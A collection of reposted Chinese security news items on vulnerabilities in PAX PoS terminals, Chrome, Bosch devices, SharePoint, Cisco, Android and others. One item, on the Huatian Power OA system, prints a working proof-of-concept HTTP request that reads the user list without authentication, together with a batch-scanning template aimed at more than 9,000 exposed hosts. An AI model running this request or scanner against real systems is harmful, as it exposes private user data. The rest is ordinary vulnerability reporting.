渗透测试公司 STM Cyber 报告称，PAX Technology 的基于 Android 的 PoS（销售点）终端受到一系列漏洞的影响，这些漏洞可被利用来执行任意代码或命令。 PAX 总部位于中国，生产支付终端、密码键盘以及 PoS 硬件和软件，产品销往全球。PAX 的 PoS 设备在基于 Android 的 PayDroid 上运行。 据 STM Cyber 称，虽然沙箱可以防止终端上的应用程序相互交互，但具有 root 访问权限的攻击者可以篡改任何应用程序，包括支付流程。 尽管攻击者无法访问解密的支付信息，但他们可以修改交易金额和其他相关数据，STM Cyber 在 PAX PoS 设备中发现了六个漏洞，在一份技术报告中解释道，该报告还包括证明：概念（PoC）利用。 该公司表示，攻击者可以通过物理 USB 访问易受攻击的设备来利用其中三个问题。 第一个漏洞 CVE-2023-4818 允许攻击者将 PAX A920 设备的引导加载程序降级到以前的、可能存在漏洞的版本。然而，签名检查仅允许加载由 PAX 签名的引导加载程序。 第二个问题 CVE-2023-42134 允许攻击者注入内核参数并在任何 PAX PoS 设备上以 root 权限执行任意代码。该错误可以在快速启动模式下通过执行隐藏命令来覆盖未签名的分区来利用。 接下来是 CVE-2023-42135，这是一个类似的内核参数注入缺陷，导致通过刷新不同的未签名分区来执行代码。该问题影响 PAX A920Pro/A50 设备。 STM Cyber 解释说，影响所有 PAX PoS 终端的另外两个漏洞可以被攻击者利用 shell 访问易受攻击的设备来执行任意命令。 第一个漏洞编号为 CVE-2023-42136，允许攻击者注入以特定单词开头的 shell 命令，绕过现有检查并获得“系统”权限。 攻击者可以利用第二个缺陷 CVE-2023-42137 覆盖任意文件，并可能将其权限提升到系统或 root。 第六个安全缺陷（编号为 CVE-2023-42133）的详细信息尚未发布。 STM Cyber 于 2023 年 5 月向 PAX 报告了这些漏洞，并于 8 月通知了波兰 CERT。PAX 已发布针对所有漏洞的补丁。   转自安全客，原文链接：https://www.anquanke.com/post/id/292699 封面来源于网络，如有侵权请联系删除

谷歌发布了一项紧急更新，旨在修复 Chrome 浏览器中的三个高度严重的安全漏洞，并警告其中一个漏洞已被广泛利用。 被利用的零日漏洞被标记为 CVE-2024-0519，被描述为 V8 JavaScript 引擎中的越界内存访问问题。 按照惯例，谷歌未提供关于攻击范围的详细信息，也没有共享遥测数据来帮助防御者寻找妥协的迹象。 谷歌的一份简要声明指出：“谷歌已经获知了与 CVE-2024-0519 漏洞相关的报告。” 公司表示，这个零日漏洞是匿名报告的。 最新的 Chrome 浏览器更新还解决了 V8 中另外两个被评为高危的内存安全问题。谷歌表示，此次更新还包括了在内部通过审计、模糊测试等方式发现的多项修复。 就在几周前，谷歌发布了针对多个内存安全问题的补丁，这些问题使用户容易受到代码执行攻击的威胁。 2023 年，谷歌修复了至少 7 个在野外利用过程中发现的零日漏洞。   转自安全客，原文链接：https://www.anquanke.com/post/id/292683 封面来源于网络，如有侵权请联系删除

Bitdefender 警告物联网设备所有者面临新风险。 Bitdefender发现了 广泛使用的博世 BCC100家用Wi -Fi恒温器中的一个漏洞。该漏洞允许攻击者远程操纵设备设置（包括温度）并安装恶意软件。 所有物联网 ( IoT ) 设备，从咖啡机到安全摄像头，都可能面临黑客攻击的风险。Bitdefender 实验室创建了第一个智能家居网络安全中心，定期审核流行的物联网设备是否存在漏洞。他们的最新研究揭示了影响博世 BCC100 恒温器版本 1.7.0 到 HD 版本 4.13.22 的漏洞。 该安全漏洞于 2023 年 8 月 29 日被发现，但直到 2024 年 1 月 11 日该公司修复后才公布详细信息。CVE-2023-49722漏洞允许攻击者用恶意固件替换设备的固件，然后自行决定使用受感染的恒温器，从而完全控制其功能。 BCC100温控器使用两个微控制器：用于Wi-Fi功能的海飞芯片（HF-LPT230）和用于设备主逻辑的意法半导体芯片（STM32F103）。STM 芯片没有联网功能，依赖Wi-Fi 芯片进行通信。Wi-Fi 芯片侦听本地网络上的TCP 端口 8899，并通过 UART 数据总线将接收到的消息直接传输到主微控制器。 然而，如果消息格式良好，则微控制器无法区分恶意消息和云服务器发送的真实消息。攻击者可以利用它向恒温器发送任意命令，包括恶意更新。 恒温器通过 WebSocket 使用 JSON 数据包与服务器“connect.boschconnectedcontrol[.]com”进行通信，这很容易被欺骗。设备在端口8899上发出“device/update”命令，导致恒温器向云服务器查询信息。 尽管存在错误代码，设备仍接受带有更新详细信息的虚假响应，包括自定义URL 、大小、 MD5 校验和和固件版本。然后，设备请求云服务器下载固件并通过 WebSocket 传输，确保指定的 URL 可用。收到文件后，设备会执行更新，完成攻击。 为避免可能出现的风险，建议用户采取必要的安全措施，包括定期更新温控器固件、更改默认管理密码、避免未经授权的温控器连接互联网、使用防火墙限制未经授权的设备访问等。 值得注意的是，就在上周，另一家网络安全公司的专家透露了博世生产的另一款产品——广泛应用于各行业的联网工业冲击扳手——的多个漏洞细节。利用这些漏洞的后果是生产完全停止以及昂贵的设备损坏。 类似的研究再次提醒我们，即使看似无害的联网智能设备也可能给用户带来非常具体的安全风险。 随着智能设备市场的增长，制造商必须优先考虑安全性并确保安全可靠的连接环境，用户必须负责制造商的定期更新和其他建议。   转自安全客，原文链接：https://www.anquanke.com/post/id/292656 封面来源于网络，如有侵权请联系删除

近期，华天动力OA被爆存在未授权访问漏洞，攻击者可以读取用户信息及敏感信息等，利用 ZoomEye搜索引擎进行搜索，发现影响资产9000+。 华天动力协同办公系统将先进的管理思想、管理模式和软件技术、网络技术相结合，为用户提供了低成本、高效能的协同办公和管理平台。睿智的管理者通过使用华天动力协同办公平台，在加强规范工作流程、强化团队执行、推动精细管理、促进营业增长等工作中取得了良好的成效。 未授权访问漏洞在企业内部属于常见问题，其通常是由于安全配置不当、认证页面存在缺陷，或者根本就没有认证导致的。 通过ZoomEye网络空间搜索引擎搜索语法 app:”华天动力 OA”，发现受影响资产9000+，主要分布在中国。 修复建议：鉴权，对接口进行用户鉴权 附：漏洞复现 POC POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1 Host: {} Content-Length: 283 Pragma: no-cache Accept: application/json, text/plain, */* Cache-Control: no-cache User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: text/xml;charset=utf-8 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=E23F65531C015A84CE70FBBEAFDA5296Connection: close <buffalo-call> <method>getUserListById</method> <boolean>1</boolean> <string></string> <string>2</string> <string></string> <string></string> <boolean>1</boolean> <boolean>1</boolean> </buffalo-call> 批量检测POC（请自行搭建环境检测） id: huatian-OA-information-disclosure   info: name: huatian-OA-information-disclosure author: HackTwo severity: high     http: – raw: – | POST /OAapp/bfapp/buffalo/hrApplicationFormService HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.9 Cache-Control: no-cache Connection: close Content-Type: text/xml;charset=utf-8   <buffalo-call> <method>getUserListById</method> <boolean>1</boolean> <string></string> <string>2</string> <string></string> <string></string> <boolean>1</boolean> <boolean>1</boolean> </buffalo-call>   matchers-condition: and matchers: – type: dsl dsl: – ‘len(body)>1000’ 转自渗透安全HackTwo ，原文链接：https://mp.weixin.qq.com/s/J3xOw0geTaIbzwehk41DCQ 封面来源于网络，如有侵权请联系删除  

据网络安全公司趋势科技报告，Windows SmartScreen 中的一个最新漏洞在导致 Phemedrone Stealer 感染的攻击中被积极利用。 这一安全漏洞被标识为 CVE-2023-36025（CVSS 评分为 8.8），于 2023 年 11 月 14 日被曝光。微软当时发布了相应的补丁，而美国网络安全机构 CISA 也将其列入已知被利用漏洞目录，证实了在野外攻击中存在相关证据。 根据微软的通报，黑客可以通过向用户发送精心设计的互联网快捷方式文件（URL）并说服收件人点击它来利用该问题。 这家科技巨头表示：“黑客将能够绕过 Windows Defender SmartScreen 检查及其相关提示。” 在漏洞公开披露后，我们观察到黑客展示了对该漏洞的利用，并发布了各种概念验证 (PoC) 漏洞，并且许多黑客已将此漏洞的利用纳入其攻击链中。 现在，趋势科技报告称，恶意活动正在积极利用 CVE-2023-36025 来传播 Phemedrone Stealer，这是一种以前未知的恶意软件类型，可以从受感染的系统中获取大量信息。 Phemedrone Stealer 采用 C# 编写，可作为开源软件使用，并在 GitHub 和 Telegram 上积极维护。 除了从网络浏览器、加密货币钱包和各种消息应用程序（包括 Telegram、Steam 和 Discord）窃取数据之外，该威胁还会截取屏幕截图并收集系统信息，包括硬件详细信息和位置数据。 然后，收集到的信息通过 Telegram 泄露或发送到攻击者的命令与控制 (C&C) 服务器。 作为观察到的攻击的一部分，利用 CVE-2023-36025 的恶意 URL 文件托管在 Discord 或其他云服务上。执行后，这些文件会下载并执行一个控制面板项 (.cpl) 文件，该文件调用 rundll32.exe 来执行恶意 DLL，充当下一阶段的加载程序，该阶段托管在 GitHub 上。 下一阶段是一个模糊加载器，它从同一 GitHub 存储库获取 ZIP 文件。该存档包含实现持久性和加载下一阶段所需的文件，进而加载 Phemedrone Stealer 有效负载。 趋势科技指出：“尽管已经打了补丁，但黑客仍在继续寻找利用 CVE-2023-36025 并逃避 Windows Defender SmartScreen 保护的方法，以多种恶意软件类型感染用户，包括勒索软件和 Phemedrone Stealer 等窃取程序。”   转自安全客，原文链接：https://www.anquanke.com/post/id/292678 封面来源于网络，如有侵权请联系删除

CISA 警告说，攻击者现在正在利用一个关键的 Microsoft SharePoint 权限提升漏洞，该漏洞可以与另一个关键漏洞相结合以实现远程代码执行。 该安全漏洞的编号为CVE-2023-29357，该安全漏洞使远程攻击者能够通过使用欺骗性 JWT 身份验证令牌绕过身份验证，从而在未修补的服务器上获得管理员权限。 微软在公告中解释说：“获得欺骗性 JWT 身份验证令牌的攻击者可以使用它们来执行网络攻击，绕过身份验证并允许他们获得经过身份验证的用户的权限。” “成功利用此漏洞的攻击者可以获得管理员权限。攻击者不需要任何权限，用户也不需要执行任何操作。” 将此缺陷与CVE-2023-24955 SharePoint Server 远程代码执行漏洞链接起来时，远程攻击者还可以通过命令注入在受感染的 SharePoint 服务器上执行任意代码。 STAR Labs 研究员Jang (Nguyễn Tiến Giang)在去年 2023 年 3 月于温哥华举行的 Pwn2Own 竞赛中成功演示了这个 Microsoft SharePoint Server 漏洞链，并获得了 100,000 美元的奖励。 研究人员于 9 月 25 日发布了一份技术分析报告，详细描述了利用过程。演示视频链接：https://youtu.be/x0DPpVh8fO4 就在一天后，一名安全研究人员还在 GitHub 上发布了 CVE-2023-29357 概念验证漏洞。 尽管该漏洞无法在目标系统上远程执行代码，但由于它不是 Pwn2Own 演示的链的完整漏洞，其作者表示，攻击者可以将其与 CVE-2023-24955 漏洞本身链接起来进行 RCE。 PoC 漏洞利用的开发人员表示：“该脚本会输出管理员用户的详细信息，并且可以在单一和大规模利用模式下运行。该脚本不包含执行 RCE 的功能，并且仅用于教育目的以及合法和授权的测试。” 之后，该漏洞利用链的其他 PoC 漏洞在网上出现，降低了漏洞利用门槛，甚至允许技能较低的攻击者在野外利用中部署它。 虽然尚未提供有关 CVE-2023-29357 主动利用的更多详细信息，但 CISA 已将该漏洞添加到其已知被利用的漏洞目录中，现在要求美国联邦机构在本月底（即 1 月 31 日）之前修复该漏洞。   转自会杀毒的单反狗，原文链接：https://mp.weixin.qq.com/s/5wNwPmKzFjfYqB-D6wc-QA 封面来源于网络，如有侵权请联系删除

近日，思科修补了一个关键的 Unity Connection 安全漏洞，该漏洞可让未经认证的攻击者在未打补丁的设备上远程获得 root 权限。 Unity Connection 是一个完全虚拟化的消息和语音邮件解决方案，适用于电子邮件收件箱、Web 浏览器、Cisco Jabber、Cisco Unified IP Phone、智能手机或平板电脑，支持高可用性和冗余。 该漏洞（CVE-2024-20272）出现在该软件基于网络的管理界面上，是由于特定 API 缺乏身份验证以及对用户提供的数据验证不当造成的。攻击者可通过向目标和易受攻击系统上传任意文件，在底层操作系统上执行命令。成功利用后，攻击者可以在系统上存储恶意文件，在操作系统上执行任意命令，并将权限提升至 root。 幸运的是，思科的产品安全事故响应小组（PSIRT）表示，目前还没有证据表明该漏洞已被利用的情况出现。 利用 PoC 漏洞进行命令注入 昨天（1月10日），思科宣布修补了多款产品中的十个中等严重性安全漏洞，这些漏洞允许攻击者升级权限、发起跨站脚本（XSS）攻击、注入命令等。 其中一个漏洞的概念验证利用代码已在网上公布，该漏洞是思科 WAP371 无线接入点基于 Web 的管理界面中的一个命令注入漏洞，被追踪为 CVE-2024-20287。 尽管攻击者可以利用这个漏洞在未打补丁的设备上以 root 权限执行任意命令，但要成功利用这个漏洞还需要管理凭据。 思科表示，由于思科WAP371设备已于2019年6月达到报废年限，因此不会发布固件更新来修补 CVE-2024-20287 安全漏洞。 同时，该公司建议网络上有 WAP371 设备的客户尽快迁移到思科 Business 240AC 接入点。 去年10 月，思科还修补了两个零日漏洞（CVE-2023-20198 和 CVE-2023-20273），这些漏洞在一周内被利用入侵了 50,000 多台 IOS XE 设备。   转自FreeBuf.COM，原文链接：https://www.freebuf.com/news/389437.html 封面来源于网络，如有侵权请联系删除

谷歌在2024年初发布了针对 Android 平台 58 个漏洞的补丁，并修复了 Pixel 设备中的 3 个安全漏洞。 2024年1月的首次安全更新于1月1日发布，着重修补了系统框架和组件中的10个被评定为“高危”的安全漏洞。 谷歌在其公告中指出：“这些问题中最严重的是框架组件中的一个高安全漏洞，可能会导致未授权的本地权限提升。” 该安全更新解决了框架组件中的五个缺陷，包括四个权限提升和一个信息泄露错误。系统组件中还解决了其他五个问题，包括一项特权提升和四项信息泄露缺陷。 更新的第二部分，即 2024 年 1 月 5 日安全补丁级别，包括针对 Arm、Imagination Technologies、MediaTek、Unisoc 和 Qualcomm 组件中的 48 个漏洞的补丁。 虽然大多数已解决的错误的严重性评级为“高”，但高通组件中的三个问题被评级为“严重”。 所有经过2024年1月5日安全补丁更新的设备都已经得到全面修复，不仅解决了这次的问题，还包括之前所有 Android 的安全补丁。 本月，谷歌修复了影响 Pixel 设备的三个安全缺陷，所有缺陷均由高通组件构成，且全部被评为“中等严重性”。 运行安全补丁级别为 2024 年 1 月 5 日的 Pixel 设备已针对这些缺陷进行了修补，同样得到修补的还有 Android 2024 年 1 月安全公告中详细介绍的所有错误。 谷歌还宣布修复了 Wear OS 中的一个高严重性漏洞，该漏洞作为更新的一部分得到解决，该更新还包括 Android 2024 年 1 月安全更新的补丁。 所有这些缺陷也通过 Pixel Watch 设备的 2024-01-05 补丁级别更新得到解决。 尽管谷歌没有提到这些漏洞是否被实际利用，但强烈建议用户尽快更新他们的设备以确保安全。   转自安全客，原文链接：https://www.anquanke.com/post/id/292568 封面来源于网络，如有侵权请联系删除

HackerNews 编译，转载请注明出处： 美国网络安全和基础设施安全局在其 “已知被利用漏洞目录”中增加了六个漏洞，这些漏洞影响了苹果、Adobe、Apache、D-Link 和 Joomla 的产品。 已知被利用漏洞目录（简称 KEV）记录了在野攻击中被利用的安全问题，为全球组织在漏洞管理和处理优先级提供了重要参考。 CISA指出：“这些漏洞类型经常被黑客用作攻击手段，对联邦机构构成了重要威胁。” CISA 已经要求联邦机构在 1 月 29 日之前修补这六个正在被积极利用的漏洞，否则将停止使用这些存在漏洞的产品。 这次重点发现的六个漏洞如下： CVE-2023-27524：Apache Superset 2.0.1 版本及以下的不安全默认资源初始化问题，可能导致未经授权的访问。（评分：8.9 “高危”） CVE-2023-23752：Joomla! 4.0.0 至 4.2.7 版本中的不当访问检查可能导致未授权访问。（评分：5.3 “中危”） CVE-2023-41990：处理 iMessage 附件的字体文件中存在的远程代码执行漏洞，可能导致 iOS 16.2 及更早版本的 Apple iPhone 设备受到攻击。（评分：7.8 “高危”） CVE-2023-38203 和 CVE-2023-29300：Adobe ColdFusion 中的不受信任数据反序列化问题可能导致任意代码执行，无需用户交互。（评分：9.8 “关键危险”） CVE-2016-20017：D-Link DSL-2750B 1.05 版本之前的设备存在远程未认证命令注入漏洞，从 2016 年至 2022 年被活跃利用。（评分：9.8 “关键危险”） 其中一些列出的漏洞最近才被披露。 例如，CVE-2023-41990 早在 2019 年的 “三角测量行动” 中使用，一直到 2023 年 6 月 Kaspersky 的一些研究人员的设备受到感染时才被发现。 该漏洞是四个漏洞集合中的最后一个，黑客正在利用它来规避全球多个目标的安全防护措施，其中包括欧洲地区的 iPhone。 CVE-2023-38203 和 CVE-2023-29300 从 2023 年中期开始受到黑客利用，因为安全研究人员发现供应商的修复措施可以被绕过。 针对诸如 CVE-2023-27524 等漏洞，其 PoC 利用在去年 9 月已经公开，这可能加剧了黑客的利用活动。 建议所有组织和联邦机构检查其上述漏洞及 KEV 目录中的其他安全问题，并及时采取安全更新或其他必要的防护措施。   消息来源：bleepingcomputer，译者：Claire；   本文由 HackerNews.cc 翻译整理，封面来源于网络；   转载请注明“转自 HackerNews.cc”并附上原文

OT 网络安全公司 Nozomi Networks 表示，在汽车行业广泛使用的博世力士乐螺母扳手中发现的漏洞可能会被寻求直接经济利益的黑客或试图对目标工业组织造成破坏的攻击者利用。 Nozomi 研究人员在博世力士乐的 NXA015S-36V-B 产品中发现了安全漏洞，该产品是一款无线手持式气动扭矩扳手（也称为螺母扳手），专为安全关键的拧紧操作而设计。 该机器有一个内置显示器，为操作员提供实时数据，它还可以通过嵌入式 Wi-Fi 模块连接到无线网络，使其能够将数据传输到服务器，并允许用户远程重新编程。 Nozomi 研究人员发现了二十多个漏洞，其中大部分存在于 NEXO-OS 操作系统的管理应用程序中，还有一些与 SCADA、PLC 和其他系统集成而设计的通信协议有关。 利用这些漏洞可能会让未经身份验证的攻击者完全控制螺母扳手。该网络安全公司进行的实验室测试展示了攻击者如何发起勒索软件攻击，其中包括使设备无法操作并在其内置屏幕上显示勒索消息。更糟糕的是，这种攻击可以自动攻击公司的所有螺母操作员，从而导致生产线中断。 在该公司在实验室模拟的另一个攻击场景中，攻击者改变了拧紧程序配置，特别是扭矩值。这可能会导致螺栓松动，从而导致安全风险，或者制造出有缺陷的产品，从而导致财务或声誉损失。 “在关键应用中，应用到机械紧固件的最终扭矩水平经过计算和设计，以确保满足设备的整体设计和操作性能。”Nozomi 解释道。“例如，电气配电盘中使用的螺栓、螺母和固定装置必须适当拧紧，以确保高压母线等载流部件之间的连接保持低电阻。连接松动会导致工作温度升高，随着时间的推移，可能会引起火灾。” 另一方面，过度拧紧会给螺栓和螺母带来过大的压力，这可能会导致机械故障，可能导致过多的保修索赔和企业声誉受损。 总共 25 个 CVE 分配给这些缺陷，其中 11 个具有“高严重性”评级。 未经身份验证的攻击者如果能够向目标设备发送网络数据包，就可以利用 root 权限实现远程代码执行，从而彻底破坏系统。虽然利用某些缺陷需要身份验证，但可以通过将它们与其他漏洞（例如硬编码凭据）链接来实现此要求。 虽然这些漏洞是在 NXA015S-36V-B 产品中发现的，但其他力士乐 Nexo 螺母扳手也受到影响，包括多个 NXA、NXP 和 NXV 系列设备。 Bosch Rexroth 已获悉这些漏洞，Nozomi 表示该公司计划在 2024 年 1 月底之前修复这些漏洞。该供应商已发布了自己的安全公告。 为了防止恶意利用，该网络安全公司尚未公开任何技术信息。   转自会杀毒的单反狗，原文链接：https://mp.weixin.qq.com/s/JST8pEWDmfHcgNd3W7u9yw 封面来源于网络，如有侵权请联系删除